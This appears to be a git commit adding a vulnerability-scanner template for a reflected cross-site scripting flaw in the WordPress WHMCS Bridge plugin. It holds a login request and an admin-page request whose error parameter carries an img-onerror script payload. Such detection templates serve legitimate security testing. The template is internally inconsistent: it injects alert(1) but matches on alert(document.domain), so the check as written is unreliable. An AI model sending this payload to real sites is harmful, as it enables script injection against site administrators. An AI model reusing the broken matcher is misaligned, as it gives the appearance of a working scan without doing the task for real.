Create wp-whmcs-xss.yaml

2022-02-19 16:38:30 +05:30 · 2022-02-19 16:38:30 +05:30 · 9f75abc6f6
parent 4a9922a66b
commit 9f75abc6f6
1 changed files with 36 additions and 0 deletions
--- a/vulnerabilities/wordpress/wp-whmcs-xss.yaml
+++ b/vulnerabilities/wordpress/wp-whmcs-xss.yaml
@ -0,0 +1,36 @@
+id: wp-whmcs-xss
+
+info:
+  name: WHMCS Bridge < 6.4b - Reflected Cross-Site Scripting (XSS)
+  author: dhiyaneshDk
+  severity: medium
+  description: The plugin does not sanitise and escape the error parameter before outputting it back in admin dashboard, leading to a Reflected Cross-Site Scripting
+  reference: https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c
+  tags: wordpress,wp-plugin,wordpress,whmcs
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+      - |
+        GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(1)%3E HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<img src onerror=alert(document.domain)>"
+        condition: and
+
+      - type: status
+        status:
+          - 200